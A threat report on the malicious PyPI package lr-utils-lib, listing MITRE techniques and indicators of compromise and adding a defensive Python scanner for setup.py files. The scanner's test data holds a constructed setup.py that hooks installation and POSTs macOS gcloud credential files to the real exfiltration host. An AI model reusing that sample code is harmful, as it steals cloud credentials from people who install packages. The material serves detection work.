The Python package lr-utils-lib, uploaded to PyPI in June 2024, contained malicious code that runs on macOS and exfiltrates Google Cloud Platform credentials to a remote server. The package is also tied to a fake LinkedIn profile for “Lucid Zenith”, a social engineering angle that illustrates broader software supply-chain risks. #lr-utils-lib #macOS #GoogleCloudPlatform #LucidZenith #ApexCompaniesLLC
Keypoints
- A malicious Python package named “lr-utils-lib” was uploaded to PyPI in June 2024.
- The malware runs automatically at install time (its code lives in the package's setup.py) and targets macOS systems.
- It attempts to harvest Google Cloud authentication data from the gcloud CLI's credential files, application_default_credentials.json and credentials.db.
- The stolen credentials are sent to a remote server, a Google Cloud Functions endpoint, via HTTPS POST requests.
- A fake LinkedIn profile for “Lucid Zenith” raises concerns about social engineering tactics.
- AI-powered search engines inconsistently verified the false information related to the profile.
- This incident underscores the need for rigorous security practices when using third-party packages.
MITRE Techniques
- [T1195.002] Supply Chain Compromise: Compromise Software Supply Chain – The malicious code was distributed as a PyPI package and executes from setup.py when the package is installed.
- [T1552.001] Unsecured Credentials: Credentials In Files – The malware reads the gcloud CLI's application_default_credentials.json and credentials.db, which hold Google Cloud authentication data, and stages them for exfiltration.
- [T1041] Exfiltration Over C2 Channel – The malware sends the harvested credentials to a remote server identified as europe-west2-workload-422915[.]cloudfunctions[.]net via HTTPS POST requests.
- [T1585.001] Establish Accounts: Social Media Accounts – The fake LinkedIn profile for “Lucid Zenith” suggests the use of social engineering to lend credibility to the package author and encourage installation.
Indicators of Compromise
- [URL/Domain] europe-west2-workload-422915[.]cloudfunctions[.]net – remote server used for data exfiltration
- [Email] lucid[.]zeniths[.]0j@icloud[.]com – linked to the social engineering angle and profile impersonation
- [File] application_default_credentials.json – targeted credential file (the gcloud CLI stores it under ~/.config/gcloud/)
- [File] credentials.db – targeted credential database (also kept under ~/.config/gcloud/)
- [Package] lr-utils-lib – malicious Python package name
- [File/Script] setup.py – the malicious code runs from the package's setup.py at install time
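The techniques and indicators above translate directly into a pre-install check. The following is an added example, not code from the original report or from the lr-utils-lib package: it parses a setup.py with the `ast` module and flags the pattern the page describes (a `cmdclass` install hook, a macOS gate, references to the two gcloud credential files, an HTTP client import in setup.py, and the known exfiltration host), plus a small helper to confirm whether the package is present in the current environment. Both setup.py samples are constructed for the demo; the list of network modules and the set of install commands are the example's own assumptions.

```python
"""Added example: static triage of a setup.py against this page's IoCs.

The two setup.py strings below are CONSTRUCTED for the demo; they are not the
real lr-utils-lib code.
"""
import ast
import re
from importlib import metadata
from typing import List, Set

# IoCs from the page. The host is defanged there; refang() restores the dots so
# it matches what actually appears in source code.
EXFIL_HOSTS_DEFANGED = ["europe-west2-workload-422915[.]cloudfunctions[.]net"]
CREDENTIAL_FILES = ["application_default_credentials.json", "credentials.db"]
# Assumption of the example: a legitimate setup.py has no reason to import these.
NETWORK_MODULES = {"requests", "urllib", "urllib.request", "http.client", "socket"}
# setuptools commands pip runs on install; overriding them yields code execution.
INSTALL_COMMANDS = {"install", "develop", "egg_info"}


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


def _string_literals(tree: ast.AST) -> List[str]:
    return [n.value for n in ast.walk(tree)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


def _imported_modules(tree: ast.AST) -> Set[str]:
    mods: Set[str] = set()
    for n in ast.walk(tree):
        if isinstance(n, ast.Import):
            mods.update(a.name for a in n.names)
        elif isinstance(n, ast.ImportFrom) and n.module:
            mods.add(n.module)
    return mods


def _overridden_commands(tree: ast.AST) -> Set[str]:
    """Keys of any cmdclass={...} passed to setup() or setuptools.setup()."""
    keys: Set[str] = set()
    for n in ast.walk(tree):
        if not isinstance(n, ast.Call):
            continue
        f = n.func
        is_setup = (isinstance(f, ast.Name) and f.id == "setup") or \
                   (isinstance(f, ast.Attribute) and f.attr == "setup")
        if not is_setup:
            continue
        for kw in n.keywords:
            if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                keys.update(k.value for k in kw.value.keys
                            if isinstance(k, ast.Constant) and isinstance(k.value, str))
    return keys


def scan_setup_py(source: str) -> List[str]:
    """Return findings for one setup.py; an empty list means nothing was flagged."""
    tree = ast.parse(source)
    findings: List[str] = []

    def add(msg: str) -> None:
        if msg not in findings:
            findings.append(msg)

    hooks = _overridden_commands(tree) & INSTALL_COMMANDS
    if hooks:
        add(f"install-time hook: cmdclass overrides {sorted(hooks)}")
    strings = _string_literals(tree)
    if any("darwin" in s.lower() for s in strings):
        add("platform gate: checks for macOS ('darwin')")
    for s in strings:
        for name in CREDENTIAL_FILES:
            if name in s:
                add(f"credential file referenced: {name}")
        for host in EXFIL_HOSTS_DEFANGED:
            if refang(host) in s:
                add(f"known exfiltration host: {host}")
    net = _imported_modules(tree) & NETWORK_MODULES
    if net:
        add(f"network client imported in setup.py: {sorted(net)}")
    return findings


def installed_versions(package: str) -> List[str]:
    """Versions of `package` in the current environment (PEP 503 name matching)."""
    norm = lambda n: re.sub(r"[-_.]+", "-", n).lower()
    return sorted(d.version for d in metadata.distributions()
                  if norm(d.metadata.get("Name") or "") == norm(package))


# Constructed sample showing the install-time pattern the page describes (NOT the real code).
SUSPICIOUS_SETUP = '''
import os, sys
import requests
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        if sys.platform == "darwin":
            base = os.path.expanduser("~/.config/gcloud")
            for name in ("application_default_credentials.json", "credentials.db"):
                p = os.path.join(base, name)
                if os.path.exists(p):
                    with open(p, "rb") as fh:
                        requests.post("https://europe-west2-workload-422915.cloudfunctions.net/", data=fh.read())

setup(name="demo-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign sample: no hooks, no network, no credential references.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="demo-pkg", version="0.1", packages=["demo_pkg"])
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, scan_setup_py(src) or "clean")
    print("lr-utils-lib installed:", installed_versions("lr-utils-lib") or "no")
```

Run it against an extracted sdist (`pip download --no-binary :all: --no-deps <pkg>`, then unpack) before installing; a `cmdclass` hook alone is not proof of malice, since some legitimate packages compile extensions that way, but a hook combined with a network import or a credential-path string in setup.py is worth reading by hand.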